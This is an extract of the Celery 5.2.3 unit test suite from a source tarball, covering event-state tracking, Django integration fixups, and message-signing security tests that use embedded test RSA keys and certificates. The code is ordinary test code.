(2, 2) task.event('retried', time(), time()) assert task.state == states.RETRY def test_repr(self): assert repr(Task(uuid='xxx', name='tasks.add')) class test_State: def test_repr(self): assert repr(State()) def test_pickleable(self): state = State() r = ev_logical_clock_ordering(state) r.play() assert pickle.loads(pickle.dumps(state)) def test_task_logical_clock_ordering(self): state = State() r = ev_logical_clock_ordering(state) tA, tB, tC = r.uids r.play() now = list(state.tasks_by_time()) assert now[0][0] == tA assert now[1][0] == tC assert now[2][0] == tB for _ in range(1000): shuffle(r.uids) tA, tB, tC = r.uids r.rewind_with_offset(r.current_clock + 1, r.uids) r.play() now = list(state.tasks_by_time()) assert now[0][0] == tA assert now[1][0] == tC assert now[2][0] == tB @pytest.mark.skip('TODO: not working') def test_task_descending_clock_ordering(self): state = State() r = ev_logical_clock_ordering(state) tA, tB, tC = r.uids r.play() now = list(state.tasks_by_time(reverse=False)) assert now[0][0] == tA assert now[1][0] == tB assert now[2][0] == tC for _ in range(1000): shuffle(r.uids) tA, tB, tC = r.uids r.rewind_with_offset(r.current_clock + 1, r.uids) r.play() now = 
list(state.tasks_by_time(reverse=False)) assert now[0][0] == tB assert now[1][0] == tC assert now[2][0] == tA def test_get_or_create_task(self): state = State() task, created = state.get_or_create_task('id1') assert task.uuid == 'id1' assert created task2, created2 = state.get_or_create_task('id1') assert task2 is task assert not created2 def test_get_or_create_worker(self): state = State() worker, created = state.get_or_create_worker('george@vandelay.com') assert worker.hostname == 'george@vandelay.com' assert created worker2, created2 = state.get_or_create_worker('george@vandelay.com') assert worker2 is worker assert not created2 def test_get_or_create_worker__with_defaults(self): state = State() worker, created = state.get_or_create_worker( 'george@vandelay.com', pid=30, ) assert worker.hostname == 'george@vandelay.com' assert worker.pid == 30 assert created worker2, created2 = state.get_or_create_worker( 'george@vandelay.com', pid=40, ) assert worker2 is worker assert worker2.pid == 40 assert not created2 def test_worker_online_offline(self): r = ev_worker_online_offline(State()) next(r) assert list(r.state.alive_workers()) assert r.state.workers['utest1'].alive r.play() assert not list(r.state.alive_workers()) assert not r.state.workers['utest1'].alive def test_itertasks(self): s = State() s.tasks = {'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'} assert len(list(s.itertasks(limit=2))) == 2 def test_worker_heartbeat_expire(self): r = ev_worker_heartbeats(State()) next(r) assert not list(r.state.alive_workers()) assert not r.state.workers['utest1'].alive r.play() assert list(r.state.alive_workers()) assert r.state.workers['utest1'].alive def test_task_states(self): r = ev_task_states(State()) # RECEIVED next(r) assert r.tid in r.state.tasks task = r.state.tasks[r.tid] assert task.state == states.RECEIVED assert task.received assert task.timestamp == task.received assert task.worker.hostname == 'utest1' # STARTED next(r) assert r.state.workers['utest1'].alive assert task.state == states.STARTED assert task.started assert task.timestamp == task.started assert task.worker.hostname == 'utest1' # REVOKED next(r) assert task.state == states.REVOKED assert task.revoked assert task.timestamp == task.revoked assert task.worker.hostname == 'utest1' # RETRY next(r) assert task.state == states.RETRY assert task.retried assert task.timestamp == task.retried assert task.worker.hostname, 'utest1' assert task.exception == "KeyError('bar')" assert task.traceback == 'line 2 at main' # FAILURE next(r) assert task.state == states.FAILURE assert task.failed assert task.timestamp == task.failed assert task.worker.hostname == 'utest1' assert task.exception == "KeyError('foo')" assert task.traceback == 'line 1 at main' # SUCCESS next(r) assert task.state == states.SUCCESS assert task.succeeded assert task.timestamp == task.succeeded assert task.worker.hostname == 'utest1' assert task.result == '4' assert task.runtime == 0.1234 # children, parent, root r.play() assert r.tid2 in r.state.tasks task2 = r.state.tasks[r.tid2] assert task2.parent is task assert task2.root is task assert task2 in task.children def test_task_children_set_if_received_in_wrong_order(self): r = ev_task_states(State()) r.events.insert(0, r.events.pop()) r.play() assert r.state.tasks[r.tid2] in r.state.tasks[r.tid].children assert r.state.tasks[r.tid2].root is r.state.tasks[r.tid] assert r.state.tasks[r.tid2].parent is r.state.tasks[r.tid] def assertStateEmpty(self, state): assert not state.tasks assert not state.workers assert not 
state.event_count assert not state.task_count def assertState(self, state): assert state.tasks assert state.workers assert state.event_count assert state.task_count def test_freeze_while(self): s = State() r = ev_snapshot(s) r.play() def work(): pass s.freeze_while(work, clear_after=True) assert not s.event_count s2 = State() r = ev_snapshot(s2) r.play() s2.freeze_while(work, clear_after=False) assert s2.event_count def test_clear_tasks(self): s = State() r = ev_snapshot(s) r.play() assert s.tasks s.clear_tasks(ready=False) assert not s.tasks def test_clear(self): r = ev_snapshot(State()) r.play() assert r.state.event_count assert r.state.workers assert r.state.tasks assert r.state.task_count r.state.clear() assert not r.state.event_count assert not r.state.workers assert r.state.tasks assert not r.state.task_count r.state.clear(False) assert not r.state.tasks def test_task_types(self): r = ev_snapshot(State()) r.play() assert sorted(r.state.task_types()) == ['task1', 'task2'] def test_tasks_by_time(self): r = ev_snapshot(State()) r.play() assert len(list(r.state.tasks_by_time())) == 20 assert len(list(r.state.tasks_by_time(reverse=False))) == 20 def test_tasks_by_type(self): r = ev_snapshot(State()) r.play() assert len(list(r.state.tasks_by_type('task1'))) == 10 assert len(list(r.state.tasks_by_type('task2'))) == 10 assert len(r.state.tasks_by_type['task1']) == 10 assert len(r.state.tasks_by_type['task2']) == 10 def test_alive_workers(self): r = ev_snapshot(State()) r.play() assert len(list(r.state.alive_workers())) == 3 def test_tasks_by_worker(self): r = ev_snapshot(State()) r.play() assert len(list(r.state.tasks_by_worker('utest1'))) == 10 assert len(list(r.state.tasks_by_worker('utest2'))) == 10 assert len(r.state.tasks_by_worker['utest1']) == 10 assert len(r.state.tasks_by_worker['utest2']) == 10 def test_survives_unknown_worker_event(self): s = State() s.event({ 'type': 'worker-unknown-event-xxx', 'foo': 'bar', }) s.event({ 'type': 'worker-unknown-event-xxx', 'hostname': 'xxx', 'foo': 'bar', }) def test_survives_unknown_worker_leaving(self): s = State(on_node_leave=Mock(name='on_node_leave')) (worker, created), subject = s.event({ 'type': 'worker-offline', 'hostname': 'unknown@vandelay.com', 'timestamp': time(), 'local_received': time(), 'clock': 301030134894833, }) assert worker == Worker('unknown@vandelay.com') assert not created assert subject == 'offline' assert 'unknown@vandelay.com' not in s.workers s.on_node_leave.assert_called_with(worker) def test_on_node_join_callback(self): s = State(on_node_join=Mock(name='on_node_join')) (worker, created), subject = s.event({ 'type': 'worker-online', 'hostname': 'george@vandelay.com', 'timestamp': time(), 'local_received': time(), 'clock': 34314, }) assert worker assert created assert subject == 'online' assert 'george@vandelay.com' in s.workers s.on_node_join.assert_called_with(worker) def test_survives_unknown_task_event(self): s = State() s.event({ 'type': 'task-unknown-event-xxx', 'foo': 'bar', 'uuid': 'x', 'hostname': 'y', 'timestamp': time(), 'local_received': time(), 'clock': 0, }) def test_limits_maxtasks(self): s = State(max_tasks_in_memory=1) s.heap_multiplier = 2 s.event({ 'type': 'task-unknown-event-xxx', 'foo': 'bar', 'uuid': 'x', 'hostname': 'y', 'clock': 3, 'timestamp': time(), 'local_received': time(), }) s.event({ 'type': 'task-unknown-event-xxx', 'foo': 'bar', 'uuid': 'y', 'hostname': 'y', 'clock': 4, 'timestamp': time(), 'local_received': time(), }) s.event({ 'type': 'task-unknown-event-xxx', 'foo': 'bar', 'uuid': 
'z', 'hostname': 'y', 'clock': 5, 'timestamp': time(), 'local_received': time(), }) assert len(s._taskheap) == 2 assert s._taskheap[0].clock == 4 assert s._taskheap[1].clock == 5 s._taskheap.append(s._taskheap[0]) assert list(s.tasks_by_time()) def test_callback(self): scratch = {} def callback(state, event): scratch['recv'] = True s = State(callback=callback) s.event({'type': 'worker-online'}) assert scratch.get('recv') def test_deepcopy(self): import copy s = State() s.event({ 'type': 'task-success', 'root_id': 'x', 'uuid': 'x', 'hostname': 'y', 'clock': 3, 'timestamp': time(), 'local_received': time(), }) s.event({ 'type': 'task-success', 'root_id': 'y', 'uuid': 'y', 'hostname': 'y', 'clock': 4, 'timestamp': time(), 'local_received': time(), }) copy.deepcopy(s) ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.819757 celery-5.2.3/t/unit/fixups/0000775000175000017500000000000000000000000015435 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/fixups/__init__.py0000664000175000017500000000000000000000000017534 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/fixups/test_django.py0000664000175000017500000002561100000000000020315 0ustar00asifasif00000000000000from contextlib import contextmanager from unittest.mock import Mock, patch import pytest from celery.fixups.django import (DjangoFixup, DjangoWorkerFixup, FixupWarning, _maybe_close_fd, fixup) from t.unit import conftest class FixupCase: Fixup = None @contextmanager def fixup_context(self, app): with patch('celery.fixups.django.DjangoWorkerFixup.validate_models'): with patch('celery.fixups.django.symbol_by_name') as symbyname: with patch('celery.fixups.django.import_module') as impmod: f = self.Fixup(app) yield f, impmod, symbyname class test_DjangoFixup(FixupCase): Fixup = DjangoFixup def test_setting_default_app(self): from celery import _state prev, _state.default_app = _state.default_app, None try: app = Mock(name='app') DjangoFixup(app) app.set_default.assert_called_with() finally: _state.default_app = prev @patch('celery.fixups.django.DjangoWorkerFixup') def test_worker_fixup_property(self, DjangoWorkerFixup): f = DjangoFixup(self.app) f._worker_fixup = None assert f.worker_fixup is DjangoWorkerFixup() assert f.worker_fixup is DjangoWorkerFixup() def test_on_import_modules(self): f = DjangoFixup(self.app) f.worker_fixup = Mock(name='worker_fixup') f.on_import_modules() f.worker_fixup.validate_models.assert_called_with() def test_autodiscover_tasks(self, patching): patching.modules('django.apps') from django.apps import apps f = DjangoFixup(self.app) configs = [Mock(name='c1'), Mock(name='c2')] apps.get_app_configs.return_value = configs assert f.autodiscover_tasks() == [c.name for c in configs] @pytest.mark.masked_modules('django') def test_fixup_no_django(self, patching, mask_modules): with patch('celery.fixups.django.DjangoFixup') as Fixup: patching.setenv('DJANGO_SETTINGS_MODULE', '') fixup(self.app) Fixup.assert_not_called() patching.setenv('DJANGO_SETTINGS_MODULE', 'settings') with pytest.warns(FixupWarning): fixup(self.app) Fixup.assert_not_called() def test_fixup(self, patching): with patch('celery.fixups.django.DjangoFixup') as Fixup: patching.setenv('DJANGO_SETTINGS_MODULE', '') fixup(self.app) Fixup.assert_not_called() 
patching.setenv('DJANGO_SETTINGS_MODULE', 'settings') with conftest.module_exists('django'): import django django.VERSION = (1, 11, 1) fixup(self.app) Fixup.assert_called() def test_maybe_close_fd(self): with patch('os.close'): _maybe_close_fd(Mock()) _maybe_close_fd(object()) def test_init(self): with self.fixup_context(self.app) as (f, importmod, sym): assert f def test_install(self, patching): self.app.loader = Mock() self.cw = patching('os.getcwd') self.p = patching('sys.path') self.sigs = patching('celery.fixups.django.signals') with self.fixup_context(self.app) as (f, _, _): self.cw.return_value = '/opt/vandelay' f.install() self.sigs.worker_init.connect.assert_called_with(f.on_worker_init) assert self.app.loader.now == f.now self.p.insert.assert_called_with(0, '/opt/vandelay') def test_now(self): with self.fixup_context(self.app) as (f, _, _): assert f.now(utc=True) f._now.assert_not_called() assert f.now(utc=False) f._now.assert_called() def test_on_worker_init(self): with self.fixup_context(self.app) as (f, _, _): with patch('celery.fixups.django.DjangoWorkerFixup') as DWF: f.on_worker_init() DWF.assert_called_with(f.app) DWF.return_value.install.assert_called_with() assert f._worker_fixup is DWF.return_value class test_DjangoWorkerFixup(FixupCase): Fixup = DjangoWorkerFixup def test_init(self): with self.fixup_context(self.app) as (f, importmod, sym): assert f def test_install(self): self.app.conf = {'CELERY_DB_REUSE_MAX': None} self.app.loader = Mock() with self.fixup_context(self.app) as (f, _, _): with patch('celery.fixups.django.signals') as sigs: f.install() sigs.beat_embedded_init.connect.assert_called_with( f.close_database, ) sigs.worker_ready.connect.assert_called_with(f.on_worker_ready) sigs.task_prerun.connect.assert_called_with(f.on_task_prerun) sigs.task_postrun.connect.assert_called_with(f.on_task_postrun) sigs.worker_process_init.connect.assert_called_with( f.on_worker_process_init, ) def test_on_worker_process_init(self, patching): with self.fixup_context(self.app) as (f, _, _): with patch('celery.fixups.django._maybe_close_fd') as mcf: _all = f._db.connections.all = Mock() conns = _all.return_value = [ Mock(), Mock(), ] conns[0].connection = None with patch.object(f, 'close_cache'): with patch.object(f, '_close_database'): f.on_worker_process_init() mcf.assert_called_with(conns[1].connection) f.close_cache.assert_called_with() f._close_database.assert_called_with(force=True) f.validate_models = Mock(name='validate_models') patching.setenv('FORKED_BY_MULTIPROCESSING', '1') f.on_worker_process_init() f.validate_models.assert_called_with() def test_on_task_prerun(self): task = Mock() with self.fixup_context(self.app) as (f, _, _): task.request.is_eager = False with patch.object(f, 'close_database'): f.on_task_prerun(task) f.close_database.assert_called_with() task.request.is_eager = True with patch.object(f, 'close_database'): f.on_task_prerun(task) f.close_database.assert_not_called() def test_on_task_postrun(self): task = Mock() with self.fixup_context(self.app) as (f, _, _): with patch.object(f, 'close_cache'): task.request.is_eager = False with patch.object(f, 'close_database'): f.on_task_postrun(task) f.close_database.assert_called() f.close_cache.assert_called() # when a task is eager, don't close connections with patch.object(f, 'close_cache'): task.request.is_eager = True with patch.object(f, 'close_database'): f.on_task_postrun(task) f.close_database.assert_not_called() f.close_cache.assert_not_called() def test_close_database(self): with 
self.fixup_context(self.app) as (f, _, _): with patch.object(f, '_close_database') as _close: f.db_reuse_max = None f.close_database() _close.assert_called_with() _close.reset_mock() f.db_reuse_max = 10 f._db_recycles = 3 f.close_database() _close.assert_not_called() assert f._db_recycles == 4 _close.reset_mock() f._db_recycles = 20 f.close_database() _close.assert_called_with() assert f._db_recycles == 1 def test__close_database(self): with self.fixup_context(self.app) as (f, _, _): conns = [Mock(), Mock(), Mock()] conns[1].close.side_effect = KeyError('already closed') f.DatabaseError = KeyError f.interface_errors = () f._db.connections = Mock() # ConnectionHandler f._db.connections.all.side_effect = lambda: conns f._close_database(force=True) conns[0].close.assert_called_with() conns[0].close_if_unusable_or_obsolete.assert_not_called() conns[1].close.assert_called_with() conns[1].close_if_unusable_or_obsolete.assert_not_called() conns[2].close.assert_called_with() conns[2].close_if_unusable_or_obsolete.assert_not_called() for conn in conns: conn.reset_mock() f._close_database() conns[0].close.assert_not_called() conns[0].close_if_unusable_or_obsolete.assert_called_with() conns[1].close.assert_not_called() conns[1].close_if_unusable_or_obsolete.assert_called_with() conns[2].close.assert_not_called() conns[2].close_if_unusable_or_obsolete.assert_called_with() conns[1].close.side_effect = KeyError( 'omg') f._close_database() with pytest.raises(KeyError): f._close_database(force=True) conns[1].close.side_effect = None conns[1].close_if_unusable_or_obsolete.side_effect = KeyError( 'omg') f._close_database(force=True) with pytest.raises(KeyError): f._close_database() def test_close_cache(self): with self.fixup_context(self.app) as (f, _, _): f.close_cache() f._cache.close_caches.assert_called_with() def test_on_worker_ready(self): with self.fixup_context(self.app) as (f, _, _): f._settings.DEBUG = False f.on_worker_ready() with pytest.warns(UserWarning): f._settings.DEBUG = True f.on_worker_ready() @pytest.mark.patched_module('django', 'django.db', 'django.core', 'django.core.cache', 'django.conf', 'django.db.utils') def test_validate_models(self, patching, module): f = self.Fixup(self.app) f.django_setup = Mock(name='django.setup') patching.modules('django.core.checks') from django.core.checks import run_checks f.validate_models() f.django_setup.assert_called_with() run_checks.assert_called_with() def test_django_setup(self, patching): patching('celery.fixups.django.symbol_by_name') patching('celery.fixups.django.import_module') django, = patching.modules('django') f = self.Fixup(self.app) f.django_setup() django.setup.assert_called_with() ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.819757 celery-5.2.3/t/unit/security/0000775000175000017500000000000000000000000015766 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/security/__init__.py0000664000175000017500000000700000000000000020074 0ustar00asifasif00000000000000""" Keys and certificates for tests (KEY1 is a private key of CERT1, etc.) 
Generated with `extra/security/get-cert.sh` """ KEY1 = """-----BEGIN RSA PRIVATE KEY----- MIICXQIBAAKBgQC9Twh0V5q/R1Q8N+Y+CNM4lj9AXeZL0gYowoK1ht2ZLCDU9vN5 dhV0x3sqaXLjQNeCGd6b2vTbFGdF2E45//IWz6/BdPFWaPm0rtYbcxZHqXDZScRp vFDLHhMysdqQWHxXVxpqIXXo4B7bnfnGvXhYwYITeEyQylV/rnH53mdV8wIDAQAB AoGBAKUJN4elr+S9nHP7D6BZNTsJ0Q6eTd0ftfrmx+jVMG8Oh3jh6ZSkG0R5e6iX 0W7I4pgrUWRyWDB98yJy1o+90CAN/D80o8SbmW/zfA2WLBteOujMfCEjNrc/Nodf 6MZ0QQ6PnPH6pp94i3kNmFD8Mlzm+ODrUjPF0dCNf474qeKhAkEA7SXj5cQPyQXM s15oGX5eb6VOk96eAPtEC72cLSh6o+VYmXyGroV1A2JPm6IzH87mTqjWXG229hjt XVvDbdY2uQJBAMxblWFaWJhhU6Y1euazaBl/OyLYlqNz4LZ0RzCulEoV/gMGYU32 PbilD5fpFsyhp5oCxnWNEsUFovYMKjKM3AsCQQCIlOcBoP76ZxWzRK8t56MaKBnu fiuAIzbYkDbPp12i4Wc61wZ2ozR2Y3u4Bh3tturb6M+04hea+1ZSC5StwM85AkAp UPLYpe13kWXaGsHoVqlbTk/kcamzDkCGYufpvcIZYGzkq6uMmZZM+II4klWbtasv BhSdu5Hp54PU/wyg/72VAkBy1/oM3/QJ35Vb6TByHBLFR4nOuORoRclmxcoCPva9 xqkQQn+UgBtOemRXpFCuKaoXonA3nLeB54SWcC6YUOcR -----END RSA PRIVATE KEY-----""" KEY2 = """-----BEGIN RSA PRIVATE KEY----- MIICXQIBAAKBgQDH22L8b9AmST9ABDmQTQ2DWMdDmK5YXZt4AIY81IcsTQ/ccM0C fwXEP9tdkYwtcxMCWdASwY5pfMy9vFp0hyrRQMSNfuoxAgONuNWPyQoIvY3ZXRe6 rS+hb/LN4+vdjX+oxmYiQ2HmSB9rh2bepE6Cw+RLJr5sXXq+xZJ+BLt5tQIDAQAB AoGBAMGBO0Arip/nP6Rd8tYypKjN5nEefX/1cjgoWdC//fj4zCil1vlZv12abm0U JWNEDd2y0/G1Eow0V5BFtFcrIFowU44LZEiSf7sKXlNHRHlbZmDgNXFZOt7nVbHn 6SN+oCYjaPjji8idYeb3VQXPtqMoMn73MuyxD3k3tWmVLonpAkEA6hsu62qhUk5k Nt88UZOauU1YizxsWvT0bHioaceE4TEsbO3NZs7dmdJIcRFcU787lANaaIq7Rw26 qcumME9XhwJBANqMOzsYQ6BX54UzS6x99Jjlq9MEbTCbAEZr/yjopb9f617SwfuE AEKnIq3HL6/Tnhv3V8Zy3wYHgDoGNeTVe+MCQQDi/nyeNAQ8RFqTgh2Ak/jAmCi0 yV/fSgj+bHgQKS/FEuMas/IoL4lbrzQivkyhv5lLSX0ORQaWPM+z+A0qZqRdAkBh XE+Wx/x4ljCh+nQf6AzrgIXHgBVUrfi1Zq9Jfjs4wnaMy793WRr0lpiwaigoYFHz i4Ei+1G30eeh8dpYk3KZAkB0ucTOsQynDlL5rLGYZ+IcfSfH3w2l5EszY47kKQG9 Fxeq/HOp9JYw4gRu6Ycvqu57KHwpHhR0FCXRBxuYcJ5V -----END RSA PRIVATE KEY-----""" CERT1 = """-----BEGIN CERTIFICATE----- MIICVzCCAcACCQC72PP7b7H9BTANBgkqhkiG9w0BAQUFADBwMQswCQYDVQQGEwJV UzELMAkGA1UECBMCQ0ExCzAJBgNVBAcTAlNGMQ8wDQYDVQQKEwZDZWxlcnkxDzAN BgNVBAMTBkNFbGVyeTElMCMGCSqGSIb3DQEJARYWY2VydEBjZWxlcnlwcm9qZWN0 Lm9yZzAeFw0xMzA3MjQxMjExMTRaFw0xNDA3MjQxMjExMTRaMHAxCzAJBgNVBAYT AlVTMQswCQYDVQQIEwJDQTELMAkGA1UEBxMCU0YxDzANBgNVBAoTBkNlbGVyeTEP MA0GA1UEAxMGQ0VsZXJ5MSUwIwYJKoZIhvcNAQkBFhZjZXJ0QGNlbGVyeXByb2pl Y3Qub3JnMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC9Twh0V5q/R1Q8N+Y+ CNM4lj9AXeZL0gYowoK1ht2ZLCDU9vN5dhV0x3sqaXLjQNeCGd6b2vTbFGdF2E45 //IWz6/BdPFWaPm0rtYbcxZHqXDZScRpvFDLHhMysdqQWHxXVxpqIXXo4B7bnfnG vXhYwYITeEyQylV/rnH53mdV8wIDAQABMA0GCSqGSIb3DQEBBQUAA4GBAKA4tD3J 94tsnQxFxHP7Frt7IvGMH+3wMqOiXFgYxPJX2tyaPvOLJ/7ERE4MkrvZO7IRC0iA yKBe0pucdrTgsJoDV8juahuyjXOjvU14+q7Wv7pj7zqddVavzK8STLX4/FMIDnbK aMGJl7wyj6V2yy6ANSbmy0uQjHikI6DrZEoK -----END CERTIFICATE-----""" CERT2 = """-----BEGIN CERTIFICATE----- MIICATCCAWoCCQCV/9A2ZBM37TANBgkqhkiG9w0BAQUFADBFMQswCQYDVQQGEwJB VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0 cyBQdHkgTHRkMB4XDTExMDcxOTA5MDkwMloXDTEyMDcxODA5MDkwMlowRTELMAkG A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0 IFdpZGdpdHMgUHR5IEx0ZDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAx9ti /G/QJkk/QAQ5kE0Ng1jHQ5iuWF2beACGPNSHLE0P3HDNAn8FxD/bXZGMLXMTAlnQ EsGOaXzMvbxadIcq0UDEjX7qMQIDjbjVj8kKCL2N2V0Xuq0voW/yzePr3Y1/qMZm IkNh5kgfa4dm3qROgsPkSya+bF16vsWSfgS7ebUCAwEAATANBgkqhkiG9w0BAQUF AAOBgQBzaZ5vBkzksPhnWb2oobuy6Ne/LMEtdQ//qeVY4sKl2tOJUCSdWRen9fqP e+zYdEdkFCd8rp568Eiwkq/553uy4rlE927/AEqs/+KGYmAtibk/9vmi+/+iZXyS WWZybzzDZFncq1/N1C3Y/hrCBNDFO4TsnTLAhWtZ4c0vDAiacw== -----END CERTIFICATE-----""" 
celery-5.2.3/t/unit/security/case.py

import pytest


class SecurityCase:

    def setup(self):
        pytest.importorskip('cryptography')

celery-5.2.3/t/unit/security/test_certificate.py

import datetime
import os
from unittest.mock import Mock, patch

import pytest

from celery.exceptions import SecurityError
from celery.security.certificate import Certificate, CertStore, FSCertStore
from t.unit import conftest

from . import CERT1, CERT2, KEY1
from .case import SecurityCase


class test_Certificate(SecurityCase):

    def test_valid_certificate(self):
        Certificate(CERT1)
        Certificate(CERT2)

    def test_invalid_certificate(self):
        with pytest.raises((SecurityError, TypeError)):
            Certificate(None)
        with pytest.raises(SecurityError):
            Certificate('')
        with pytest.raises(SecurityError):
            Certificate('foo')
        with pytest.raises(SecurityError):
            Certificate(CERT1[:20] + CERT1[21:])
        with pytest.raises(SecurityError):
            Certificate(KEY1)

    @pytest.mark.skip('TODO: cert expired')
    def test_has_expired(self):
        assert not Certificate(CERT1).has_expired()

    def test_has_expired_mock(self):
        x = Certificate(CERT1)
        x._cert = Mock(name='cert')
        time_after = datetime.datetime.utcnow() + datetime.timedelta(days=-1)
        x._cert.not_valid_after = time_after
        assert x.has_expired() is True

    def test_has_not_expired_mock(self):
        x = Certificate(CERT1)
        x._cert = Mock(name='cert')
        time_after = datetime.datetime.utcnow() + datetime.timedelta(days=1)
        x._cert.not_valid_after = time_after
        assert x.has_expired() is False


class test_CertStore(SecurityCase):

    def test_itercerts(self):
        cert1 = Certificate(CERT1)
        cert2 = Certificate(CERT2)
        certstore = CertStore()
        for c in certstore.itercerts():
            assert False
        certstore.add_cert(cert1)
        certstore.add_cert(cert2)
        for c in certstore.itercerts():
            assert c in (cert1, cert2)

    def test_duplicate(self):
        cert1 = Certificate(CERT1)
        certstore = CertStore()
        certstore.add_cert(cert1)
        with pytest.raises(SecurityError):
            certstore.add_cert(cert1)


class test_FSCertStore(SecurityCase):

    @patch('os.path.isdir')
    @patch('glob.glob')
    @patch('celery.security.certificate.Certificate')
    def test_init(self, Certificate, glob, isdir):
        cert = Certificate.return_value = Mock()
        cert.has_expired.return_value = False
        isdir.return_value = True
        glob.return_value = ['foo.cert']
        with conftest.open():
            cert.get_id.return_value = 1
            path = os.path.join('var', 'certs')
            x = FSCertStore(path)
            assert 1 in x._certs
            glob.assert_called_with(os.path.join(path, '*'))
            # they both end up with the same id
            glob.return_value = ['foo.cert', 'bar.cert']
            with pytest.raises(SecurityError):
                x = FSCertStore(path)
            glob.return_value = ['foo.cert']
            cert.has_expired.return_value = True
            with pytest.raises(SecurityError):
                x = FSCertStore(path)
            isdir.return_value = False
            with pytest.raises(SecurityError):
                x = FSCertStore(path)

celery-5.2.3/t/unit/security/test_key.py

import pytest
from kombu.utils.encoding import ensure_bytes

from celery.exceptions import SecurityError
from celery.security.key import PrivateKey
from celery.security.utils import
get_digest_algorithm from . import CERT1, KEY1, KEY2 from .case import SecurityCase class test_PrivateKey(SecurityCase): def test_valid_private_key(self): PrivateKey(KEY1) PrivateKey(KEY2) def test_invalid_private_key(self): with pytest.raises((SecurityError, TypeError)): PrivateKey(None) with pytest.raises(SecurityError): PrivateKey('') with pytest.raises(SecurityError): PrivateKey('foo') with pytest.raises(SecurityError): PrivateKey(KEY1[:20] + KEY1[21:]) with pytest.raises(SecurityError): PrivateKey(CERT1) def test_sign(self): pkey = PrivateKey(KEY1) pkey.sign(ensure_bytes('test'), get_digest_algorithm()) with pytest.raises(AttributeError): pkey.sign(ensure_bytes('test'), get_digest_algorithm('unknown')) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/security/test_security.py0000664000175000017500000001257600000000000021261 0ustar00asifasif00000000000000"""Keys and certificates for tests (KEY1 is a private key of CERT1, etc.) Generated with: .. code-block:: console $ openssl genrsa -des3 -passout pass:test -out key1.key 1024 $ openssl req -new -key key1.key -out key1.csr -passin pass:test $ cp key1.key key1.key.org $ openssl rsa -in key1.key.org -out key1.key -passin pass:test $ openssl x509 -req -days 365 -in cert1.csr \ -signkey key1.key -out cert1.crt $ rm key1.key.org cert1.csr """ import builtins import os import tempfile from unittest.mock import Mock, patch import pytest from kombu.exceptions import SerializerNotInstalled from kombu.serialization import disable_insecure_serializers, registry from celery.exceptions import ImproperlyConfigured, SecurityError from celery.security import disable_untrusted_serializers, setup_security from celery.security.utils import reraise_errors from t.unit import conftest from . 
import CERT1, KEY1 from .case import SecurityCase class test_security(SecurityCase): def teardown(self): registry._disabled_content_types.clear() registry._set_default_serializer('json') try: registry.unregister('auth') except SerializerNotInstalled: pass def test_disable_insecure_serializers(self): try: disabled = registry._disabled_content_types assert disabled disable_insecure_serializers( ['application/json', 'application/x-python-serialize'], ) assert 'application/x-yaml' in disabled assert 'application/json' not in disabled assert 'application/x-python-serialize' not in disabled disabled.clear() disable_insecure_serializers(allowed=None) assert 'application/x-yaml' in disabled assert 'application/json' in disabled assert 'application/x-python-serialize' in disabled finally: disable_insecure_serializers(allowed=['json']) @patch('celery.security._disable_insecure_serializers') def test_disable_untrusted_serializers(self, disable): disable_untrusted_serializers(['foo']) disable.assert_called_with(allowed=['foo']) def test_setup_security(self): with tempfile.NamedTemporaryFile(mode='w', delete=False) as tmp_key1: tmp_key1.write(KEY1) with tempfile.NamedTemporaryFile(mode='w', delete=False) as tmp_cert1: tmp_cert1.write(CERT1) self.app.conf.update( task_serializer='auth', accept_content=['auth'], security_key=tmp_key1.name, security_certificate=tmp_cert1.name, security_cert_store='*.pem', ) self.app.setup_security() os.remove(tmp_key1.name) os.remove(tmp_cert1.name) def test_setup_security_disabled_serializers(self): disabled = registry._disabled_content_types assert len(disabled) == 0 self.app.conf.task_serializer = 'json' with pytest.raises(ImproperlyConfigured): self.app.setup_security() assert 'application/x-python-serialize' in disabled disabled.clear() self.app.conf.task_serializer = 'auth' with pytest.raises(ImproperlyConfigured): self.app.setup_security() assert 'application/json' in disabled disabled.clear() @patch('celery.current_app') def test_setup_security__default_app(self, current_app): with pytest.raises(ImproperlyConfigured): setup_security() @patch('celery.security.register_auth') @patch('celery.security._disable_insecure_serializers') def test_setup_registry_complete(self, dis, reg, key='KEY', cert='CERT'): calls = [0] def effect(*args): try: m = Mock() m.read.return_value = 'B' if calls[0] else 'A' return m finally: calls[0] += 1 self.app.conf.task_serializer = 'auth' self.app.conf.accept_content = ['auth'] with conftest.open(side_effect=effect): with patch('celery.security.registry') as registry: store = Mock() self.app.setup_security(['json'], key, cert, store) dis.assert_called_with(['json']) reg.assert_called_with('A', 'B', store, 'sha256', 'json') registry._set_default_serializer.assert_called_with('auth') def test_security_conf(self): self.app.conf.task_serializer = 'auth' with pytest.raises(ImproperlyConfigured): self.app.setup_security() self.app.conf.accept_content = ['auth'] with pytest.raises(ImproperlyConfigured): self.app.setup_security() _import = builtins.__import__ def import_hook(name, *args, **kwargs): if name == 'cryptography': raise ImportError return _import(name, *args, **kwargs) builtins.__import__ = import_hook with pytest.raises(ImproperlyConfigured): self.app.setup_security() builtins.__import__ = _import def test_reraise_errors(self): with pytest.raises(SecurityError): with reraise_errors(errors=(KeyError,)): raise KeyError('foo') with pytest.raises(KeyError): with reraise_errors(errors=(ValueError,)): raise KeyError('bar') 
celery-5.2.3/t/unit/security/test_serialization.py
import base64
import os

import pytest
from kombu.serialization import registry
from kombu.utils.encoding import bytes_to_str

from celery.exceptions import SecurityError
from celery.security.certificate import Certificate, CertStore
from celery.security.key import PrivateKey
